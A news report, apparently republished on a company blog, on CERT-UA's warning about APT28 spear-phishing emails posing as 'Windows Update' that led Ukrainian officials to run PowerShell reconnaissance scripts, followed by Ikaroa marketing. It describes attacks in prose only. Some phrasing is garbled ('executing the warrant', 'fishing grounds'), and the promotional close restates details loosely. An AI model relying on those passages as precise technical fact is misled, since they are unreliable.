Ukraine’s Cyber Emergency Response Team (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers against various government bodies in the country.
The agency attributed the phishing campaign to APT28, which also goes by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit and Sofacy.
The emails come with the subject line “Windows Update” and allegedly contain instructions in the Ukrainian language to run a PowerShell command under the guise of security updates.
Script execution loads and executes a next-stage PowerShell script designed to gather basic system information using commands such as task list and system information, and extract the details using an HTTP request to an API Mocky.
To trick the targets into executing the warrant, the emails impersonated system administrators of the targeted government entities using fake Microsoft Outlook email accounts created with the employees’ real names and initials.
CERT-UA recommends that organizations restrict the ability of users to run PowerShell scripts and monitor network connections in the Mocky API.
The disclosure comes weeks after APT28 was linked to attacks that exploit now-patched security flaws in network equipment to perform reconnaissance and deploy malware against selected targets.
Google’s Threat Analysis Group (TAG), in an advisory released last month, detailed a credential harvesting operation conducted by the threat actor to redirect visitors to Ukrainian government websites to to fishing grounds.
Hacking teams based in Russia have also been linked to exploiting a critical privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS Score: 9.8) in targeted intrusions against the government , transport, energy and military sectors in Europe.
Learn how to stop ransomware with real-time protection
Join our webinar and learn how to stop ransomware attacks with real-time MFA and service account protection.
Save my seat!
The development also comes as Fortinet FortiGuard Labs discovered a multi-stage phishing attack that leverages a macro-laced Word document purportedly from Ukraine’s Energoatom as a lure to offer the open-source Havoc post-exploitation framework.
“It is highly likely that Russian intelligence, military and law enforcement services have a long-standing tacit understanding with cybercriminal threat actors,” cybersecurity firm Recorded Future said in a report earlier this year .
“In some cases, it is almost certain that these agencies maintain an established and systematic relationship with cybercriminal threat actors, either through indirect collaboration or through recruitment.”
Recently, a hacking group known as APT28 was reported to have targeted Ukrainian government entities with fake “Windows Update” emails. The emails were sent as a form of spear-phishing and contained malicious files, also known as malware.
As a full-stack tech company, Ikaroa is constantly researching new threats and how we can help defend our clients against attacks like this one. Our team of security experts stay on top of the latest trends in digital security threats and are actively developing solutions to keep businesses safe.
This malicious email campaign is part of an ongoing trend of cyber-attacks that use tactics such as fake email notification to access important information. Our experts offer guidance on anti-virus and other security measures for our clients.
At Ikaroa we believe that the only way to stay safe in an increasingly digital world is by understanding the risks and making the necessary security measures to safeguard against such threats. To that end, we have developed solutions that help protect against malicious emails, such as those sent by APT28.
We are committed to providing comprehensive security solutions in order to keep our clients safe and secure, and to prevent them from being targeted by suspicious threats such as these. Our solutions offer complete protection and help provide peace of mind and security for our clients as they go about their digital activities.